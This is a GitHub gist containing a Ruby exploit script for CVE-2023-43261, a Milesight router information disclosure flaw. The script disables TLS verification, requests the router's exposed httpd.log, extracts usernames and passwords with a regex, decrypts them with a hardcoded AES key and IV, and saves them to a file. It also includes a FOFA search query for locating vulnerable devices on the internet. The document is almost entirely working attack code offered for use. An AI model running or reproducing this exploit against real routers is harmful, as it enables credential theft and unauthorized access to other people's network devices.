Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Created October 8, 2023 14:08
Show Gist options
  • Save komodoooo/f157ceff2ec609d6be2ef21ef252a928 to your computer and use it in GitHub Desktop.
Save komodoooo/f157ceff2ec609d6be2ef21ef252a928 to your computer and use it in GitHub Desktop.
CVE-2023-43261 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-43261
Milesight routers information disclosure exploit
By komodo\n
"""
=begin
FOFA query to search vulnerable targets:
fid="GbJynh0UR3NG6v4f7DclRQ=="
=end
def d64(text)
return text.unpack("m")[0]
end
$cont=1
$dirname="Milesight_dump"
def dir(name=$dirname)
begin
Dir.mkdir(name)
Dir.chdir(name)
rescue Errno::EEXIST
$cont+=1
dir("#{$dirname}-#{$cont}")
end
end
def decrypt(password)
begin
cipher = OpenSSL::Cipher.new('AES-128-CBC')
cipher.decrypt
cipher.key, cipher.iv = "1"*16, "2"*16
decrypted_data = cipher.update(d64(password))+cipher.final
return decrypted_data.unpack('C*').pack('C*').force_encoding('utf-8').to_s
rescue
return password
end
end
def main(url)
url.delete_suffix!("/") unless url[-1..-1] != "/"
@ctx = OpenSSL::SSL::SSLContext.new()
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
r=HTTP.get("#{url}/lang/log/httpd.log", :ssl_context=>@ctx)
if r.code == 200 && r.body.to_s.include?("password")
dir()
File.open("!target.txt", "w"){|f|f.write(url)}
credentials = r.body.to_s.scan(/"username":"(.+?)","password":"(.+?)"/)
log = File.open("credentials.txt", "w")
credentials.each do |username, password|
log.write("Username: #{username}, Password: #{decrypt(password)}\n")
end
log.close()
puts File.read("credentials.txt")
puts "\nCredentials saved on '#{Dir.pwd.split("/")[-1]}/credentials.txt' file."
else
puts "Not vulnerable! :(\n"
end
end
begin
print "Base URL: "
main(gets.chomp)
rescue => e
abort(e.to_s)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment